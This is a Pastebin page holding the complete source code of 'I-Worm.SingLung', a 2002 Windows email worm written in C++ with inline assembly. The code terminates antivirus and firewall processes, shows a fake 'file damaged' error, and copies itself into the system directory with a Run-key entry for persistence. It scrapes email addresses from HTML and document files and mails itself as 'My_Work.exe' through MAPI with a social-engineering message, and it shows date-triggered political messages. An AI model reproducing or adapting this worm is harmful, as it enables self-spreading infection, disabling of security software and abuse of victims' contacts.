API tools faq
paste
FlyFar

I-Worm.SingLung - Source Code

FlyFar
Jul 13th, 2023
111
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 8.39 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2. Name : I-Worm.SingLung
  3. Author : PetiK
  4. Date : January 23rd 2002 - January 26th 2002
  5. Language : C++/Win32asm
  6.  
  7. Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);
  8. */
  9.  
  10. #include <stdio.h>
  11. #include <windows.h>
  12. #include <mapi.h>
  13. #include <tlhelp32.h>
  14. #pragma argused
  15. #pragma inline
  16.  
  17.  
  18. char    filename[100],sysdir[100],sysdr[100],winhtm[100];
  19. LPSTR   Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
  20.     SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
  21. int i;
  22. HANDLE  fd,lSnapshot,myproc;
  23. BOOL    rProcessFound;
  24. BYTE    desktop[50],favoris[50],personal[50],cache[50];
  25. DWORD   sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
  26.     sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
  27. DWORD   type=REG_SZ;
  28. FILE    *stopv;
  29.  
  30. LHANDLE session;
  31. MapiMessage mess;
  32. MapiRecipDesc from;
  33. HINSTANCE hMAPI;
  34.  
  35. HKEY        hReg;
  36. PROCESSENTRY32  uProcess;
  37. SYSTEMTIME  systime;
  38. WIN32_FIND_DATA ffile;
  39. HDC     dc;
  40.  
  41. void Welcome();
  42. void StopAV(char *);
  43. void FindFile(char *,char *);
  44. void GetMail(char *,char *);
  45. void sendmail(char *);
  46. void FeedBack();
  47.  
  48. //ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
  49. ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
  50.  
  51.  
  52. int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
  53. {
  54.     /*
  55.     // Worm in RegisterServiceProcess
  56.     HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
  57.     if(kern32) {
  58.         (FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
  59.         if(RegSerPro)
  60.         RegSerPro(NULL,1);
  61.     }   */
  62.  
  63. // Fuck some AntiVirus hahahaha
  64. StopAV("AVP32.EXE");        // AVP
  65. StopAV("AVPCC.EXE");        // AVP
  66. StopAV("AVPM.EXE");     // AVP
  67. StopAV("WFINDV32.EXE");     // Dr. Solomon
  68. StopAV("F-AGNT95.EXE");     // F-Secure
  69. StopAV("NAVAPW32.EXE");     // Norton Antivirus
  70. StopAV("NAVW32.EXE");       // Norton Antivirus
  71. StopAV("NMAIN.EXE");        // Norton Antivirus
  72. StopAV("PAVSCHED.EXE");     // Panda AntiVirus
  73. StopAV("ZONEALARM.EXE");    // ZoneAlarm
  74.  
  75. GetModuleFileName(hInst,filename,100);
  76. GetSystemDirectory((char *)sysdir,100);
  77.  
  78. strcpy(sysdr,sysdir);
  79. strcat(sysdr,"\\MSGDI32.EXE");
  80. if((lstrcmp(filename,sysdr))!=0) {
  81.     Welcome();
  82.     }
  83. else
  84.     {
  85.     hMAPI=LoadLibrary("MAPI32.DLL");
  86.     (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  87.     RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
  88.     RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
  89.     RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
  90.     RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
  91.     RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
  92.     RegCloseKey(hReg);
  93.     GetWindowsDirectory((char *)winhtm,100);
  94.  
  95. _asm
  96. {
  97. call    @wininet
  98. db  "WININET.DLL",0
  99. @wininet:
  100. call    LoadLibrary
  101. test    eax,eax
  102. jz  end_asm
  103. mov ebp,eax
  104. call    @inetconnect
  105. db  "InternetGetConnectedState",0
  106. @inetconnect:
  107. push    ebp
  108. call    GetProcAddress
  109. test    eax,eax
  110. jz  end_wininet
  111. mov edi,eax
  112. verf:
  113. push    0
  114. push    Tmp
  115. call    edi
  116. dec eax
  117. jnz verf
  118.  
  119. end_wininet:
  120. push    ebp
  121. call    FreeLibrary
  122. end_asm:
  123. jmp end_all_asm
  124.  
  125. Tmp dd 0
  126.  
  127. end_all_asm:
  128. }
  129.  
  130.     FindFile(desktop,"*.htm");
  131.     FindFile(favoris,"*.ht*");
  132.     FindFile(personal,"*.ht*");
  133.     FindFile(personal,"*.doc");
  134.     FindFile(winhtm,".ht*");
  135.     FindFile(cache,".ht*");
  136.     FreeLibrary(hMAPI);
  137.     FeedBack();
  138.     }
  139.  
  140. strcat(sysdir,"\\MsGDI32.exe");
  141. CopyFile(filename,sysdir,FALSE);
  142. RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
  143. RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
  144. RegCloseKey(hReg);
  145.  
  146. }
  147.  
  148. void Welcome()
  149. {
  150. register char fileWel[100],messWel[25],titWel[25];
  151. strcpy(fileWel,filename);
  152. fileWel[0]=0;
  153. for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
  154. wsprintf(titWel,"Error - %s",fileWel+i+1);
  155. wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
  156. MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
  157. }
  158.  
  159.  
  160. void StopAV(char *antivirus)
  161. {
  162. register BOOL term;
  163. lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  164. uProcess.dwSize=sizeof(uProcess);
  165. rProcessFound=Process32First(lSnapshot,&uProcess);
  166. while(rProcessFound) {
  167.     if(strstr(uProcess.szExeFile,antivirus)!=NULL) {    // Norton Antivirus
  168.         myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
  169.         if(myproc!=NULL) {
  170.             term=TerminateProcess(myproc,0);
  171.         }
  172.         CloseHandle(myproc);
  173.     }
  174.     rProcessFound=Process32Next(lSnapshot,&uProcess);
  175. }
  176. CloseHandle(lSnapshot);
  177. }
  178.  
  179.  
  180. void FindFile(char *folder, char *ext)
  181. {
  182. register bool abc=TRUE;
  183. register HANDLE hFile;
  184. char mail[128];
  185. SetCurrentDirectory(folder);
  186. hFile=FindFirstFile(ext,&ffile);
  187. if(hFile!=INVALID_HANDLE_VALUE) {
  188.     while(abc) {
  189.     SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
  190.     GetMail(ffile.cFileName,mail);
  191.     if(strlen(mail)>0) {
  192.     WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
  193.     sendmail(mail);
  194.     }
  195.     abc=FindNextFile(hFile,&ffile);
  196.     }
  197. }
  198.  
  199. }
  200.  
  201. void GetMail(char *namefile, char *mail)
  202. {
  203. HANDLE  hf,hf2;
  204. char    *mapped;
  205. DWORD   size,i,k;
  206. BOOL    test=FALSE,valid=FALSE;
  207. mail[0]=0;
  208.  
  209. hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
  210. if(hf==INVALID_HANDLE_VALUE)
  211.     return;
  212. size=GetFileSize(hf,NULL);
  213. if(!size)
  214.     return;
  215. if(size<8)
  216.     return;
  217. size-=100;
  218.  
  219. hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
  220. if(!hf2) {
  221.     CloseHandle(hf);
  222.     return;
  223.     }
  224.  
  225. mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
  226. if(!mapped) {
  227.     CloseHandle(hf2);
  228.     CloseHandle(hf);
  229.     return;
  230.     }
  231.  
  232. i=0;
  233. while(i<size && !test) {
  234. if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
  235.     test=TRUE;
  236.     i+=strlen("mailto:");
  237.     k=0;
  238.     while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
  239.         if(mapped[i]!=' ') {
  240.             mail[k]=mapped[i];
  241.             k++;
  242.             if(mapped[i]=='@')
  243.                 valid=TRUE;
  244.         }
  245.         i++;
  246.     }
  247.     mail[k]=0;
  248.     } else
  249.     i++;
  250. }
  251.  
  252. if(!valid)
  253.     mail[0]=0;
  254. UnmapViewOfFile(mapped);
  255. CloseHandle(hf2);
  256. CloseHandle(hf);
  257. return;
  258. }
  259.  
  260. void sendmail(char *tos)
  261. {
  262. memset(&mess,0,sizeof(MapiMessage));
  263. memset(&from,0,sizeof(MapiRecipDesc));
  264.  
  265. from.lpszName=NULL;
  266. from.ulRecipClass=MAPI_ORIG;
  267. mess.lpszSubject="Secret for you...";
  268. mess.lpszNoteText="Hi Friend,\n\n"
  269.         "I send you my last work.\n"
  270.         "Mail me if you have some suggests.\n\n"
  271.         "   See you soon. Best Regards.";
  272.  
  273. mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
  274.     if(!mess.lpRecips)
  275.     return;
  276. memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
  277. mess.lpRecips->lpszName=tos;
  278. mess.lpRecips->lpszAddress=tos;
  279. mess.lpRecips->ulRecipClass=MAPI_TO;
  280. mess.nRecipCount=1;
  281.  
  282. mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
  283.     if(!mess.lpFiles)
  284.     return;
  285. memset(mess.lpFiles,0,sizeof(MapiFileDesc));
  286. mess.lpFiles->lpszPathName=filename;
  287. mess.lpFiles->lpszFileName="My_Work.exe";
  288. mess.nFileCount=1;
  289.  
  290. mess.lpOriginator=&from;
  291.  
  292. mSendMail(0,0,&mess,0,0);
  293.  
  294. free(mess.lpRecips);
  295. free(mess.lpFiles);
  296. }
  297.  
  298.  
  299. void FeedBack()
  300. {
  301. GetSystemTime(&systime);
  302. switch(systime.wDay) {
  303. case 7:
  304.     MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
  305.             "With this, you stop the life of women and children.",
  306.             "Message to USA",MB_OK|MB_ICONHAND);
  307.     break;
  308.  
  309. case 11:
  310.     dc=GetDC(NULL);
  311.     if(dc)
  312.     {
  313.     TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
  314.     }
  315.     ReleaseDC(NULL,dc);
  316.     break;
  317.  
  318. case 28:
  319.     stopv=fopen("StopIntifada.htm","w");
  320.     fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
  321.     fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
  322.     fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
  323.     fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
  324.     fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
  325.     fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
  326.     fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
  327.     fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
  328.     fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
  329.     fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
  330.     fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
  331.     fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
  332.     fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n");
  333.     fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
  334.     fprintf(stopv,"</body></html>");
  335.     fclose(stopv);
  336.     ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
  337.    
  338.     break;
  339. }
  340. }
Tags: internet worm
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!